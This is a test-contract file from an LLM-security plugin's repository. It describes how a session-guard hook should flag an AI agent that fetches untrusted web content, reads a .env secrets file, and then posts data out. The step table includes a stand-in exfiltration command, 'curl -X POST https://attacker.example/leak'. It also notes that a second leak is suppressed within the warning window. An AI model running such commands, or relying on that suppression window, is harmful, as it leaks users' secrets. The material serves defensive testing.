open/ktg-plugin-marketplace
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity Actions
ktg-plugin-marketplace/plugins/llm-security/examples/lethal-trifecta-walkthrough/expected-findings.md
Kjell Tore Guttormsen 583a78c6cc feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs] 
Companion to 8df5d5c (which only carried the doc updates — the example
directories themselves were left out of staging by mistake). This
commit adds the actual example mappes:

- examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs,
  expected-findings.md}
- examples/mcp-rug-pull/{README.md, run-rug-pull.mjs,
  expected-findings.md}

Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section
with a 4-row table covering malicious-skill-demo, prompt-injection-
showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the
state-isolation discipline notes.

Marketplace root README unchanged since plugin's outward coverage
is unchanged ([skip-docs] covers the marketplace-level gate).
2026-05-05 14:45:39 +02:00

2.5 KiB
Raw Blame History

Expected Findings — Lethal Trifecta Walkthrough

This is the testable contract. run-trifecta.mjs exits 0 only when every row matches.

Sequence contract

Step Hook input Expected hook stdout Expected exit OWASP
1 {tool_name: "WebFetch", tool_input.url: "https://example.com/tutorial.html"} empty 0 — (single class only)
2 {tool_name: "Read", tool_input.file_path: "/Users/example/project/.env"} empty 0 — (two classes, threshold not crossed)
3 {tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak ..."} JSON {systemMessage: "SECURITY ADVISORY (session-guard): Rule of Two violation ..."} 0 LLM01, LLM02, ASI01, ASI02
4 {tool_name: "Bash", tool_input.command: "ls -la"} empty 0 — (neutral, suppression marker active)
5 {tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak2 ..."} empty 0 — (warning marker still in window — suppressed)

Advisory content (step 3)

The systemMessage payload from step 3 must contain:

  • The literal phrase Rule of Two violation
  • A list of evidence items under Untrusted input:, Data access:, Exfil sink: headings
  • A reference to Set LLM_SECURITY_TRIFECTA_MODE= for configuration
  • An OWASP tag mentioning ASI01 or ASI02

Optional (depending on detail string and policy.json config):

  • [SENSITIVE] marker on the .env path in the data-access list
  • [CRITICAL] framing if mcpInfo.concentrated or sensitiveExfil applies — for this walkthrough, sensitiveExfil is true, so the advisory severity is critical in the audit-trail event

Audit-trail side effect

When LLM_SECURITY_AUDIT_LOG (or policy.json audit.log_path) is set, step 3 writes a JSONL event:

{
  "event_type": "trifecta_warning",
  "severity": "critical",
  "source": "post-session-guard",
  "details": { "evidence": {...}, "mcp_concentrated": false, "sensitive_exfil": true },
  "owasp": ["ASI01", "ASI02", "LLM01"],
  "action_taken": "warned"
}

The walkthrough does not configure the audit log — writeAuditEvent no-ops when no path is set. To observe the audit-trail behaviour, re-run with LLM_SECURITY_AUDIT_LOG=/tmp/trifecta-audit.jsonl.

State file

  • Written to ${os.tmpdir()}/llm-security-session-${run-trifecta-pid}.jsonl
  • Contains 5 entry rows + 1 warning marker after step 3 = 6 lines
  • Deleted by run-trifecta.mjs's finally block on exit
  • No interaction with the user's real session state files